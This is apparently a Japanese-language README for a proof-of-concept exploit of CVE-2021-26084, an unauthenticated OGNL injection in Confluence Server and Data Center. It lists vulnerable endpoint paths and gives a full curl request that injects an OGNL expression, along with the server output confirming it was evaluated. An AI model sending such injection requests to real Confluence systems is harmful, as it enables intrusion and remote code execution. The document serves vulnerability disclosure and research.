
CVE-2021-26084の概念実証(PoC)エクスプロイト。Confluence ServerおよびData CenterにおけるOGNLインジェクションの脆弱性を標的とし、認証なしのリモートコード実行を実証します。
OGNLインジェクションの脆弱性が存在し、認証されたユーザー、場合によっては認証されていないユーザーがConfluence ServerまたはData Centerインスタンス上で任意のコードを実行できる可能性があります。

エントリーポイントとインジェクションを見つけるための私の奮闘 XD
| 奮闘 (1) | 奮闘 (2) |
|---|---|
![]() | ![]() |
最終的に悪用したConfluenceのエントリーポイント
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
最初の手動確認: 注: 事前認証ユーザー
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
サーバーレスポンス:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
素晴らしいwriteupがここに投稿されています:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
非常に参考になるヒント:
@wvuuuuuuuuuuuuu
@iamnoooob
Alex Hernandez 別名 (@_alt3kx_)